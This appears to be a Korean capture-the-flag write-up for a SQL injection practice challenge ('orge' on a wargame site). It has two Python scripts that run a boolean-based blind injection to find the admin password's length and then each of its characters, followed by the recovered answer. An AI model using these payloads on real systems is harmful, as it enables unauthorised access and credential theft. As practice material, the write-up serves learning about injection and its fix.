1. pw length 구하기
import requests
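# Boolean-based blind length probe against the practice challenge.
# Each request asks whether the admin row's pw has length i; the page is
# treated as answering "true" when the response contains "Hello admin".
# Defensive takeaway: that true/false difference in the response is the whole
# leak. Presumably pw is concatenated into the SQL text server-side (not
# visible here); binding it as a query parameter removes the oracle.
MAX_PW_LENGTH = 64  # constructed upper bound so a dead session cannot loop forever
cookies = {"PHPSESSID": ""}  # challenge session id; left blank on the page

for i in range(1, MAX_PW_LENGTH + 1):
    url = f"https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20%7C%7C%20id=%27admin%27%20%26%26%20length(pw)={i}%23"
    # timeout: a stalled connection should raise instead of hanging the script
    res = requests.get(url, cookies=cookies, timeout=10)
    if "Hello admin" in res.text:
        print('pw length : ', i)
        break
else:
    # Reached only when no candidate matched, e.g. with an empty or expired
    # PHPSESSID the marker text never appears.
    print('pw length not found; check that PHPSESSID is a valid session')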
2. pw 하나하나 구하기
import requests
import threading
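def req_url(i):
    """Recover one character of the admin pw through a boolean response oracle.

    For the 1-based position ``i`` (the index handed to SQL ``substr``), each
    code point from 48 to 122 is tried in ascending order. The first request
    whose response contains 'Hello admin' identifies the character, which is
    printed together with its index.

    The write-up notes that MySQL compares these strings without regard to
    case, so for a letter the uppercase code point (65-90) matches before the
    lowercase range is reached; the reported case is therefore not
    authoritative.

    Defensive takeaway: the only signal used is whether the marker text is
    present, so any page whose output depends on an injectable condition
    leaks data one comparison at a time. Parameterized queries close this.
    """
    cookies = {"PHPSESSID": ""}  # challenge session id; left blank on the page
    for c in range(48, 123):
        response = requests.get(
            f"https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=' %7C%7C id='admin' %26%26 substr(pw,{i},1)=char({c})%23",
            cookies=cookies,
            timeout=10,  # fail instead of blocking this worker thread forever
        )
        if 'Hello admin' in response.text:
            print('index:', str(i), ' char:', chr(c))
            # Readable paraphrase of the condition just tested; the request
            # itself carries the URL-encoded || and && forms, not or/and.
            print("' or id='admin' and substr(pw," + str(i) + ",1)=char(" + str(c) + ")%23\n")
            return
    # No candidate matched: report it so a missing position is not mistaken
    # for a thread that is still running.
    print('index:', str(i), ' no match (check PHPSESSID and the tested range)')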
# Launch one worker per character position. range(1, 9) yields positions
# 1..8, which lines up with the 8-character result shown below the script.
# Workers print as they finish, so output lines can arrive in any order;
# the index printed by req_url is what identifies each position.
positions = range(1, 9)
for i in positions:
    t = threading.Thread(
        target=req_url,
        args=(i,),
    )
    t.start()
7B751AEC
MySQL은 문자열 비교에서 대소문자를 구별하지 않기 때문에, 위에서 나온 값을 소문자로 바꿔서도 시도해 봤다.